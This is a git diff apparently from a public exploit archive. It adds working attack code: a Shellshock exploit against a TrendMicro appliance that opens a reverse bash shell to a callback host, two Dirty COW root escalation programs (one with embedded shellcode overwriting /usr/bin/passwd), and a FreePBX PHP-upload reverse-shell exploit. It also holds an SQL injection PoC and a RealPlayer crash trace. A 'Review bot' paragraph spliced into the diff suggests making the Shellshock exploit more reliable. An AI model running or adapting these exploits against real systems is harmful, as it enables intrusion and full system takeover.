 40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471
 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0
+40614,platforms/php/webapps/40614.py,"FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0
+40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0
+40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
+40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
+40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
diff --git a/platforms/hardware/remote/40619.py b/platforms/hardware/remote/40619.py
new file mode 100755
index 000000000..3646068ff
--- /dev/null
+++ b/platforms/hardware/remote/40619.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+# TrendMicro InterScan Web Security Virtul Appliance
+# ==================================================
+# InterScan Web Security is a software virtual appliance that
+# dynamically protects against the ever-growing flood of web
+# threats at the Internet gateway exclusively designed to secure
+# you against traditional and emerging web threats at the Internet
+# gateway. The appliance however is shipped with a vulnerable
+# version of Bash susceptible to shellshock (I know right?). An
+# attacker can exploit this vulnerability by calling the CGI
+# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
+# to perform arbitrary code execution. A limitation of this
+# vulnerability is that the attacker must have credentials for
+# the admin web interface to exploit this flaw. The panel runs
+# over HTTP by default so a man-in-the-middle attack could be
+# used to gain credentials and compromise the appliance.
+#
+# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
+# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
+# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
+# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
+# [-] exploiting shellshock CVE-2014-6271...
+# bash: no job control in this shell
+# bash-4.1$ id
+# uid=498(iscan) gid=499(iscan) groups=499(iscan)
+#
+# -- Hacker Fantastic
+#
+# (https://www.myhackerhouse.com)
+import SimpleHTTPServer
+import subprocess
+import requests
+import sys
+import os
+
+def spawn_listener():
+ os.system("nc -l 8080")
+
+def shellshock(ip,session,cbip):
+ user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
+ cookies = {'JSESSIONID': session}
+ print "[-] exploiting shellshock CVE-2014-6271..."
+ myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
+
+def login_http(ip,user,password):
+ mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
+ print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
+ myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
+ session_cookie = myreq.history[0].cookies.get('JSESSIONID')
+ print "[-] JSESSIONID = %s" % session_cookie
+ return session_cookie
+
+if __name__ == "__main__":
+ print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
+ if len(sys.argv) < 5:
+ print "[-] use with "
+ sys.exit()
+ newRef=os.fork()
+ if newRef==0:
+ spawn_listener()
+ else:
+ session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
+ shellshock(sys.argv[1],session,sys.argv[4])
diff --git a/platforms/linux/local/40611.c b/platforms/linux/local/40611.c
new file mode 100755
index 000000000..296d2e0d6
--- /dev/null
+++ b/platforms/linux/local/40611.c
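Review bot: `login_http` reads `myreq.history[0].cookies` without checking that the login actually redirected, so a wrong password or a changed login form surfaces as an IndexError — or, if the cookie is simply absent, as a `None` JSESSIONID silently sent on to `cgiCmdNotify` — rather than a clear failure; add `if not myreq.history or not session_cookie: sys.exit("[!] login failed for %s" % ip)` before the `return`. The usage branch under `if len(sys.argv) < 5:` prints only `[-] use with ` — its argument list appears to have been lost (likely angle-bracketed placeholders stripped on the way in), so it should read `print "[-] use with <target> <user> <password> <callback_ip>"`. The callback port `8080` and management port `1812` are each hard-coded in more than one place (the User-Agent payload, the `nc` listener, both URLs); two module-level constants would keep the reverse-shell payload and the listener from drifting apart. The listener is `nc -l 8080`, which on the classic netcat needs `-l -p 8080`; a comment stating which `nc` flavour this was tested with would save the next user a silent failure.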
@@ -0,0 +1,110 @@
+/*
+####################### dirtyc0w.c #######################
+$ sudo -s
+# echo this is not a test > foo
+# chmod 0404 foo
+$ ls -lah foo
+-r-----r-- 1 root root 19 Oct 20 15:23 foo
+$ cat foo
+this is not a test
+$ gcc -lpthread dirtyc0w.c -o dirtyc0w
+$ ./dirtyc0w foo m00000000000000000
+mmap 56123000
+madvise 0
+procselfmem 1800000000
+$ cat foo
+m00000000000000000
+####################### dirtyc0w.c #######################
+*/
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+void *map;
+int f;
+struct stat st;
+char *name;
+
+void *madviseThread(void *arg)
+{
+ char *str;
+ str=(char*)arg;
+ int i,c=0;
+ for(i=0;i<100000000;i++)
+ {
+/*
+You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
+> This is achieved by racing the madvise(MADV_DONTNEED) system call
+> while having the page of the executable mmapped in memory.
+*/
+ c+=madvise(map,100,MADV_DONTNEED);
+ }
+ printf("madvise %d\n\n",c);
+}
+
+void *procselfmemThread(void *arg)
+{
+ char *str;
+ str=(char*)arg;
+/*
+You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
+> The in the wild exploit we are aware of doesn't work on Red Hat
+> Enterprise Linux 5 and 6 out of the box because on one side of
+> the race it writes to /proc/self/mem, but /proc/self/mem is not
+> writable on Red Hat Enterprise Linux 5 and 6.
+*/
+ int f=open("/proc/self/mem",O_RDWR);
+ int i,c=0;
+ for(i=0;i<100000000;i++) {
+/*
+You have to reset the file pointer to the memory position.
+*/
+ lseek(f,map,SEEK_SET);
+ c+=write(f,str,strlen(str));
+ }
+ printf("procselfmem %d\n\n", c);
+}
+
+
+int main(int argc,char *argv[])
+{
+/*
+You have to pass two arguments. File and Contents.
+*/
+ if (argc<3)return 1;
+ pthread_t pth1,pth2;
+/*
+You have to open the file in read only mode.
+*/
+ f=open(argv[1],O_RDONLY);
+ fstat(f,&st);
+ name=argv[1];
+/*
+You have to use MAP_PRIVATE for copy-on-write mapping. 
+> Create a private copy-on-write mapping. Updates to the
+> mapping are not visible to other processes mapping the same
+> file, and are not carried through to the underlying file. It
+> is unspecified whether changes made to the file after the
+> mmap() call are visible in the mapped region.
+*/
+/*
+You have to open with PROT_READ.
+*/
+ map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+ printf("mmap %x\n\n",map);
+/*
+You have to do it on two threads.
+*/
+ pthread_create(&pth1,NULL,madviseThread,argv[1]);
+ pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
+/*
+You have to wait for the threads to finish.
+*/
+ pthread_join(pth1,NULL);
+ pthread_join(pth2,NULL);
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/linux/local/40616.c b/platforms/linux/local/40616.c
new file mode 100755
index 000000000..00c93bcdc
--- /dev/null
+++ b/platforms/linux/local/40616.c
@@ -0,0 +1,156 @@
+/*
+* (un)comment correct payload first (x86 or x64)!
+*
+* $ gcc cowroot.c -o cowroot -pthread
+* $ ./cowroot
+* DirtyCow root privilege escalation
+* Backing up /usr/bin/passwd.. to /tmp/bak
+* Size of binary: 57048
+* Racing, this may take a while..
+* /usr/bin/passwd is overwritten
+* Popping root shell.
+* Don't forget to restore /tmp/bak
+* thread stopped
+* thread stopped
+* root@box:/root/cow# id
+* uid=0(root) gid=1000(foo) groups=1000(foo)
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+void *map;
+int f;
+int stop = 0;
+struct stat st;
+char *name;
+pthread_t pth1,pth2,pth3;
+
+// change if no permissions to read
+char suid_binary[] = "/usr/bin/passwd";
+
+/*
+* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
+*/
+unsigned char sc[] = {
+ 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
+ 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
+ 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
+ 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
+ 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
+};
+unsigned int sc_len = 177;
+
+/*
+* $ msfvenom -p linux/x86/exec 
CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
+unsigned char sc[] = {
+ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
+ 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
+ 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
+ 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
+ 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
+ 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
+ 0x89, 0xe1, 0xcd, 0x80
+};
+unsigned int sc_len = 136;
+*/
+
+void *madviseThread(void *arg)
+{
+ char *str;
+ str=(char*)arg;
+ int i,c=0;
+ for(i=0;i<1000000 && !stop;i++) {
+ c+=madvise(map,100,MADV_DONTNEED);
+ }
+ printf("thread stopped\n");
+}
+
+void *procselfmemThread(void *arg)
+{
+ char *str;
+ str=(char*)arg;
+ int f=open("/proc/self/mem",O_RDWR);
+ int i,c=0;
+ for(i=0;i<1000000 && !stop;i++) {
+ lseek(f,map,SEEK_SET);
+ c+=write(f, str, sc_len);
+ }
+ printf("thread stopped\n");
+}
+
+void *waitForWrite(void *arg) {
+ char buf[sc_len];
+
+ for(;;) {
+ FILE *fp = fopen(suid_binary, "rb");
+
+ fread(buf, sc_len, 1, fp);
+
+ if(memcmp(buf, sc, sc_len) == 0) {
+ printf("%s is overwritten\n", suid_binary);
+ break;
+ }
+
+ fclose(fp);
+ sleep(1);
+ }
+
+ stop = 1;
+
+ printf("Popping root shell.\n");
+ printf("Don't forget to restore /tmp/bak\n");
+
+ system(suid_binary);
+}
+
+int main(int argc,char *argv[]) {
+ char *backup;
+
+ printf("DirtyCow root privilege escalation\n");
+ printf("Backing up %s.. 
to /tmp/bak\n", suid_binary);
+
+ asprintf(&backup, "cp %s /tmp/bak", suid_binary);
+ system(backup);
+
+ f = open(suid_binary,O_RDONLY);
+ fstat(f,&st);
+
+ printf("Size of binary: %d\n", st.st_size);
+
+ char payload[st.st_size];
+ memset(payload, 0x90, st.st_size);
+ memcpy(payload, sc, sc_len+1);
+
+ map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
+
+ printf("Racing, this may take a while..\n");
+
+ pthread_create(&pth1, NULL, &madviseThread, suid_binary);
+ pthread_create(&pth2, NULL, &procselfmemThread, payload);
+ pthread_create(&pth3, NULL, &waitForWrite, NULL);
+
+ pthread_join(pth3, NULL);
+
+ return 0;
+}
diff --git a/platforms/php/webapps/40612.txt b/platforms/php/webapps/40612.txt
new file mode 100755
index 000000000..982587818
--- /dev/null
+++ b/platforms/php/webapps/40612.txt
@@ -0,0 +1,12 @@
+# Exploit Title: SQL Injection in Just Dial Clone Script
+# Date: 20 October 2016
+# Exploit Author: Arbin Godar
+# Website : ArbinGodar.com
+# Vendor: http://www.i-netsolution.com/
+
+*----------------------------------------------------------------------------------------------------------------------*
+
+# Proof of Concept SQL Injection/Exploit :
+http://localhost/[PATH]/category-view-list.php?srch=PoC%27
+
+*----------------------------------------------------------------------------------------------------------------------*
diff --git a/platforms/php/webapps/40614.py b/platforms/php/webapps/40614.py
new file mode 100755
index 000000000..a9c34325a
--- /dev/null
+++ b/platforms/php/webapps/40614.py
@@ -0,0 +1,112 @@
+#!/usr/bin/env python
+'''
+ Title | FreePBX 13 Remote Command Execution and Privilege Escalation
+ Date | 10/21/2016
+ Author | Christopher Davis
+ Vendor | https://www.freepbx.org/
+ Version | FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26)
+ Tested on | http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso
+ http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso
+ Purpose | This script exploits the freepbx website, elevates privileges and returns a reverse bind tcp as root
+ Usage | python pbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444 -s r
+ Orig Author | pgt - nullsecurity.net
+'''
+import re
+import subprocess
+import argparse
+import random
+import time
+import socket
+import threading
+
+#This portion will check for requests and prompt user to install it if not already
+try:
+ import requests
+except:
+ try:
+ while True:
+ choice = raw_input('Requests library not found but is needed. Install? \'Y\'es or \'N\'o?\n:')
+ if choice.lower() == 'y':
+ subprocess.call('pip install requests',shell=True)
+ import requests
+ break
+ elif choice.lower() == 'n':
+ exit()
+ else:
+ continue
+ except Exception as e:
+ print(e)
+ exit()
+
+#Since subprocess.call will bind, we start this thread sepparate to execute after our netcat bind
+def delayGet():
+ global args
+ try:
+ time.sleep(5)
+ requests.get(args.url+ '0x4148.php.call', verify=False)
+ except:
+ pass
+
+if __name__ == '__main__':
+ try:
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-u', type=str, help='hostname and path. 
Ex- http://192.168.1.1/path/', dest='url')
+ parser.add_argument('-l', type=str, help='localhost ip to listen on', dest='lhost')
+ parser.add_argument('-p', type=str, help='port to listen on', dest='lport')
+ parser.add_argument('-s', type=str, help="'L'ocal or 'R'oot shell attempt", dest='shell')
+ parser.add_help
+ args = parser.parse_args()
+
+ #Make sure args were passed
+ if args.url == None or args.lhost == None or args.lport == None or not bool(re.search(r'^(?:[L|l]|[r|R])$', args.shell)):
+ parser.print_help()
+ print("\nUsage: python freepbx.py -u http://10.2.2.109 -l 10.2.2.115 -p 4444")
+ exit()
+
+ #Make sure the http url is there
+ if bool(re.search('[hH][tT][tT][pP][sS]?\:\/\/', args.url)) == False:
+ print('There is something wrong with your url. It needs to have http:// or https://\n\n')
+ exit()
+
+ #make sure / is there, if not, put it there
+ if args.url[-1:] != '/':
+ args.url += '/'
+ #python -c 'import pty; pty.spawn("/bin/sh")'
+ #this is the php we will upload to get a reverse shell. System call to perform reverse bash shell. 
Nohup spawns a new process in case php dies
+
+ #if version 13, lets try to get root, otherwise
+ if args.shell.upper() == 'R':
+ cmdshell = '& /dev/tcp/'+args.lhost+'/'+args.lport+' 0>&1 ");?>'
+ else:
+ cmdshell = "& /dev/tcp/"+args.lhost+"/"+args.lport+" 0>&1 ');?>"
+
+ #creates a session
+ session = requests.Session()
+ print('\nStarting Session')
+ session.get(args.url, verify=False)
+ print('\nScraping the site for a cookie')
+ HEADERS = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0", "Accept": 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language":"en-US,en;q=0.5","Referer": args.url + 'admin/ajax.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'}
+ print('\nPosting evil php')
+ postData = {'module':'hotelwakeup','command':'savecall','day':'now','time':'+1 week','destination':"/../../../../../../var/www/html/0x4148.php","language":cmdshell}
+ result = session.post(args.url + 'admin/ajax.php', headers=HEADERS, data=postData, verify=False)
+ if 'Whoops' not in result.text:
+ print(result.text)
+ print('\nSomething Went wrong. Was expecting a Whoops but none found.')
+ exit()
+ #calls the get thread which will execute 5 seconds after the netcat bind
+
+ print('\nStarting new thread for getting evil php')
+ z = threading.Thread(target=delayGet)
+ z.daemon = True
+ z.start()
+
+ print('\nBinding to socket '+ args.lport + ' Please wait... May take 30 secs to get call back.\n')
+ #This binds our terminal with netcat and waits for the call back
+ try:
+ subprocess.call('nc -nvlp '+args.lport, shell=True)
+ except Exception as e:
+ print(e)
+ print('\nIf you saw the message "sudo: no tty present and no askpass program specified", please try again and it may work.')
+ except Exception as e:
+ print(e)
+ print('\nSee above error')
diff --git a/platforms/windows/dos/40617.txt b/platforms/windows/dos/40617.txt
new file mode 100755
index 000000000..65aa165cb
--- /dev/null
+++ b/platforms/windows/dos/40617.txt 
@@ -0,0 +1,200 @@
+Tested on: Win7 / Win10 x64
+
+Date: October 20th 2016
+
+Vendor homepage: http://www.real.com
+
+Software link: http://realplayer-download.real.com/free/windows/installer/stubinst/stub/rt1/T10EUDRP/RealTimes-RealPlayer.exe
+
+File version (both realplay.exe and qcpfformat.dll): 18.1.5.705
+
+Exploit author: Alwin Peppels
+
+Found with: Peach Fuzzer
+
+Context:
+
+eax=00000002 ebx=00000000 ecx=0d4cb9a0 edx=00000000 esi=00000000 edi=046abd0c
+eip=534013dc esp=00d7e254 ebp=00d7e254 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
+qcpfformat+0x13dc:
+534013dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
+
+
+Call stack:
+ # ChildEBP RetAddr Args to Child
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 00d7e254 53401e92 00000000 00000000 0d4cb9a0 qcpfformat+0x13dc
+01 00d7e2a4 53403342 046abd0c 80004005 00000000 qcpfformat+0x1e92
+02 00d7e2d8 53402d37 1d26bbf0 74617276 534018a9 qcpfformat!RMACreateInstance+0xc62
+03 00d7e308 534030cb 046abd0c 00000000 74617276 qcpfformat!RMACreateInstance+0x657
+04 00d7e328 533e20f0 1ee51040 00000000 00000008 qcpfformat!RMACreateInstance+0x9eb
+05 00d7e348 533e1da6 00000008 00d7e370 00000005 smplfsys+0x20f0
+06 00d7e374 533e3582 00d7e394 00000000 00000000 smplfsys+0x1da6
+07 00d7e38c 5340349f 00000000 00000008 00000000 smplfsys+0x3582
+08 00d7e3b4 533e3cd9 00d7e3d0 0d4cb9a4 0d4cb9a4 qcpfformat!RMACreateInstance+0xdbf
+09 00d7e3c8 53403597 00000000 00000000 00000000 smplfsys+0x3cd9
+0a 00d7e444 533e283c 1d26bbf8 0d4cb9a4 0d4cb9a0 qcpfformat!RMACreateInstance+0xeb7
+0b 00d7e460 53402c51 1d26bbf0 00000005 0d4cb9a0 smplfsys+0x283c
+0c 00d7e488 57a8a692 1d190950 0ce86fd8 1d26bd48 qcpfformat!RMACreateInstance+0x571
+0d 00d7e4f0 57a8adfd 0d49dd78 5865cb7c 00d7e528 mametadata!SetDLLAccessPath+0x18392
+0e 00d7e568 585afd7c 0d4aca0c 046a2610 5865cb7c mametadata!SetDLLAccessPath+0x18afd
+0f 00d7e5ac 585af1d0 1d26c088 00d7e5fc 00000000 
rpcl3260!RMAShutdown+0x2584c
+10 00d7e5c0 585ae90a 00000000 1d26c088 03ecd74c rpcl3260!RMAShutdown+0x24ca0
+11 00d7e5d8 57c788ba 1d26c088 00d7e5fc 03ecd74c rpcl3260!RMAShutdown+0x243da
+12 00d7e608 57c38009 1d26c088 00000002 1d26c088 rpmn3260!SetDLLAccessPath+0x58b1a
+13 00d7e628 585bc25e 1d26c088 1d26c088 00000000 rpmn3260!SetDLLAccessPath+0x18269
+
+
+Disassembly:
+
+qcpfformat+0x13d0:
+534013d0 55 push ebp
+534013d1 8bec mov ebp,esp
+534013d3 83794000 cmp dword ptr [ecx+40h],0
+534013d7 8b5508 mov edx,dword ptr [ebp+8]
+534013da 7422 je qcpfformat+0x13fe (534013fe)
+534013dc 0fb64203 movzx eax,byte ptr [edx+3]
+534013e0 0fb64a02 movzx ecx,byte ptr [edx+2]
+534013e4 c1e008 shl eax,8
+
+
+
+The edx register is being zeroed out by the move from ebp+8 at +13d7, causing the memory read at instruction 13dc to point to 0x00000003
+
+In the analysis below the PoC files place in memory starts at 0b880012
+
+Here the first VRAT tag (hex 76 72 61 74) is read in correctly the first time from 0b881044. As can be seen in the instructions above that, on the first iteration EBP is pointing at the tags but is quickly set to an address outside the file. 
+
+
+Breakpoint 1 hit
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d0 esp=00bce58c ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
+qcpfformat+0x13d0:
+54cd13d0 55 push ebp
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d1 esp=00bce588 ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
+qcpfformat+0x13d1:
+54cd13d1 8bec mov ebp,esp
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d3 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
+qcpfformat+0x13d3:
+54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
+eip=54cd13d7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13d7:
+54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce590=0b881044
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13da esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13da:
+54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
+0:000> t
+eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13dc esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+
+qcpfformat+0x13dc:
+54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:0b881047=74
+0:000> t
+eax=00000074 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 
+qcpfformat+0x13e0:
+54cd13e0 0fb64a02 movzx ecx,byte ptr [edx+2] ds:002b:0b881046=61
+0:000> t
+eax=00000074 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e4 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13e4:
+54cd13e4 c1e008 shl eax,8
+0:000> t
+eax=00007400 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
+qcpfformat+0x13e7:
+54cd13e7 0bc1 or eax,ecx
+0:000> t
+eax=00007461 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13e9 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13e9:
+54cd13e9 0fb64a01 movzx ecx,byte ptr [edx+1] ds:002b:0b881045=72
+0:000> t
+eax=00007461 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13ed esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
+qcpfformat+0x13ed:
+54cd13ed c1e008 shl eax,8
+0:000> t
+eax=00746100 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13f0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
+qcpfformat+0x13f0:
+54cd13f0 0bc1 or eax,ecx
+0:000> t
+eax=00746172 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13f2 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
+qcpfformat+0x13f2:
+54cd13f2 0fb60a movzx ecx,byte ptr [edx] ds:002b:0b881044=76
+0:000> t
+eax=00746172 ebx=00bce5e8 ecx=00000076 edx=0b881044 esi=1c534270 edi=1ca9efb4
+eip=54cd13f5 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 
+qcpfformat+0x13f5:
+54cd13f5 c1e008 shl eax,8
+
+
+
+So now both ESP and EBP are pointing outside the source file, causing the next iteration to read NULL into EDX, setting up the access violation:
+
+
+
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d0 esp=00bce4d0 ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
+qcpfformat+0x13d0:
+54cd13d0 55 push ebp
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d1 esp=00bce4cc ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
+qcpfformat+0x13d1:
+54cd13d1 8bec mov ebp,esp
+0:000> t
